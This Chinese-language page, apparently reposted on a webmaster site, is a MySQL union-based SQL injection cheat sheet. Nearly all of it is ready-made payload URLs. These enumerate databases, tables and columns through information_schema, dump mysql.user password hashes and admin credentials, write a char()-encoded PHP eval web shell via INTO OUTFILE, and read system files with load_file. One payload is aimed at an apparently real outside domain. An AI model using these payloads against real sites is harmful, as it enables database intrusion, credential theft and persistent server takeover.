| 利用Information_schema系統(tǒng)庫來注入,配合使用group_concat()函數(shù),group_concat()功能強大,而且能夠繞過limit限制 http://127.0.0.1/sql.php?id=1 union select 0,0,0 字段為 3 http://127.0.0.1/sql.php?id=1 and 1=2 union select count(*),1,1 from mysql.user 統(tǒng)計數(shù)據(jù)庫中又多少個用戶 http://127.0.0.1/sql.php?id=1 and 1=2 union select 1,2,group_concat(schema_name) from information_schema.schemata 測試過程中只有 root權(quán)限或者 全局權(quán)限才能爆出所有數(shù)據(jù)庫 普通用戶不能爆出所有用戶 這樣就把mysql服務(wù)器所有數(shù)據(jù)庫名字顯示出來了 http://127.0.0.1/sql.php?id=1 and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x74657374 這樣就能把 test 數(shù)據(jù)庫中的 所有表顯示出來了。 其中 0x74657374 為 test 的 hex 值 http://127.0.0.1/sql.php?id=1 and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x61646D696E 這樣就把admin表中所有的字段名 顯示出來了。 這樣注入手法很靈活的。突破了 limit 限制了。 來看下 穿山甲的注入語句 以下部分只有root 權(quán)限或者 全局權(quán)限才能操作 ====================================================================================================================================== select user from mysql.user http://127.0.0.1/sql.php?id=1 and 1=2 union select concat(char(94),char(94),char(94),user,char(94),char(94),char(94)),1,1 from (select * from (select * from mysql.user order by user limit 6,1)t order by user desc)t limit 1-- 查看數(shù)據(jù)庫中有那些用戶 http://127.0.0.1/sql.php?id=1 and 1=2 union select concat(char(94),char(94),char(94),password,char(94),char(94),char(94)),1,1 from (select * from (select * from mysql.user order by user limit 6,1) t order by user desc)t limit 1-- 查看對應(yīng)用戶的 密碼 通過不斷修改limit 2,1達(dá)到查看所有 http://127.0.0.1/sql.php?id=1 and 1=2 union select concat(char(94),char(94),char(94),password,char(94),char(94),char(94)),1,1 from (select * from (select * from mysql.user order by user limit 2,1) t order by user desc)t limit 1-- =========================================================================================================================================================== http://127.0.0.1/sql.php?id=1 and 1=2 union select 1,username,password from admin limit 0,10 http://127.0.0.1/sql.php?id=1 and 1=2 union select 1,username,password from admin limit 1,10 http://127.0.0.1/sql.php?id=1 and 1=2 union select 1,username,password from admin limit 2,10 通過 limit 一條條記錄取出來 或者直接用group_concat()函數(shù) 一次顯示出來 http://127.0.0.1/sql.php?id=1 and 1=2 union select 1,group_concat(username),group_concat(password) from admin into outfile 的應(yīng)用 注意路徑是 這樣的c:/2ww.php http://127.0.0.1/sql.php?id=1 and 1=2 union select concat(char(60),char(63),char(112),char(104),char(112),char(32),char(101),char(118),char(97),char(108),char(40),char(36),char(95),char(80),char(79),char(83),char(84),char(91),char(99),char(109),char(100),char(93),char(41),char(63),char(62)),1,1 into outfile 'c:/cm14dd.php' 的 asc碼 char(60),char(63),char(112),char(104),char(112),char(32),char(101),char(118),char(97),char(108),char(40),char(36),char(95),char(80),char(79),char(83),char(84),char(91),char(99),char(109),char(100),char(93),char(41),char(63),char(62) http://127.0.0.1/sql.php?id=1 and 1=2 union select 1,'',3 into outfile 'c:/tt33.txt' load_file 的應(yīng)用 http://127.0.0.1//sql.php?id=1 and 1=2 union select concat(char(94),char(94),char(94),load_file(0x633a5c626f6f742e696e69),char(94),char(94),char(94)),1,1 -- 0x633a5c626f6f742e696e69 是 c:\boot.ini 的 hex編碼 http://127.0.0.1/sql.php?id=1 and 1=2 union select 1,2,load_file('c:/boot.ini') http://www.else1.com/concrete.php?id=5%20and%201=2%20union%20select%201,2,3,4,group_concat(schema_name)%20from%20information_schema.schemata |
免責(zé)聲明:本站部分文章和圖片均來自用戶投稿和網(wǎng)絡(luò)收集,旨在傳播知識,文章和圖片版權(quán)歸原作者及原出處所有,僅供學(xué)習(xí)與參考,請勿用于商業(yè)用途,如果損害了您的權(quán)利,請聯(lián)系我們及時修正或刪除。謝謝!
始終以前瞻性的眼光聚焦站長、創(chuàng)業(yè)、互聯(lián)網(wǎng)等領(lǐng)域,為您提供最新最全的互聯(lián)網(wǎng)資訊,幫助站長轉(zhuǎn)型升級,為互聯(lián)網(wǎng)創(chuàng)業(yè)者提供更加優(yōu)質(zhì)的創(chuàng)業(yè)信息和品牌營銷服務(wù),與站長一起進(jìn)步!讓互聯(lián)網(wǎng)創(chuàng)業(yè)者不再孤獨!
掃一掃,關(guān)注站長網(wǎng)微信
大家都在看
